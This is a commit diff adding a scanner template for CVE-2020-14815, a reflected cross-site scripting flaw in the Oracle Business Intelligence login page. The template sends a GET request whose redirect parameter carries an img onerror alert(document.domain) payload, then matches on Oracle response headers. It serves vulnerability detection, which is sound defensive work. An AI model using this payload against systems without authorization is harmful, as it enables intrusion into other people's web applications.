Create CVE-2020-14815.yaml (#836)
parent
3a6cccda48
commit
a998ecd4d2
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2020-14815
|
||||
|
||||
info:
|
||||
name: Oracle Business Intelligence XSS
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
reference: https://www.oracle.com/security-alerts/cpuoct2020.html
|
||||
tags: cve,cve2020,oracle,xss
|
||||
|
||||
# https://twitter.com/HackerOn2Wheels/status/1326927875279380480
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect=%22%3E%3Cimg/src/onerror%3dalert(document.domain)%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "X-Oracle-Dms-Ecid:"
|
||||
- "X-Oracle-Dms-Rid:"
|
||||
part: header
|
Loading…
Reference in New Issue